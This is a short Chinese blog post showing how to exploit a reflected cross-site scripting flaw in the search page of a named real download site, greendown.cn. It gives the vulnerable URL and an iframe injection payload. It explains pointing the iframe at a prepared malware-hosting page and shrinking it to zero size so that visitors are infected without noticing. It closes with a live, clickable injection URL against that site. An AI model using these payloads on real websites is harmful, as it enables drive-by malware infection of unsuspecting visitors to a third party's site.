霸王硬上弓's Blog

看了一下电脑报的教程 找了下网站 发现绿色软件联盟比较拿找连接。就拿绿色下载站 greendown . cn来做实验。

在搜索框中随便输入某字符 比如 SOFT

会得到如下地址

http://search.greendown.cn/search.asp?action=s&sType=ResName&catalog=&keyword=soft

很明显 最后的四个字幕就是我们输入的数字。由于对内容的控制不严密 使其搜索上面存在跨站漏洞 只需要将四个字幕替换成
<iframe src="http://www.baidu.com" width=50 height=50></iframe> 就可以了。

http://www.baidu.com可以修改成事先设置好的挂马网页，替换上去就行了。当然 最好把width和height改成0 这样浏览页面的时候谁都不回知道里面又内嵌了一个挂马网页 神不知鬼不觉你的电脑就中毒了。这种错误很低级。这也是常常为什么 我只浏览我常去的网站却中毒了的原因所在。当然 我们的飞扬精品软件园不存在此漏洞。

你可以访问一下网址：（放心的 不会挂马 中毒你找我！！！）

http://search.greendown.cn/search.asp?action=s&sType=ResName&catalog=&keyword=<iframe src="http://www.ich8.com" width=800 height=600></iframe>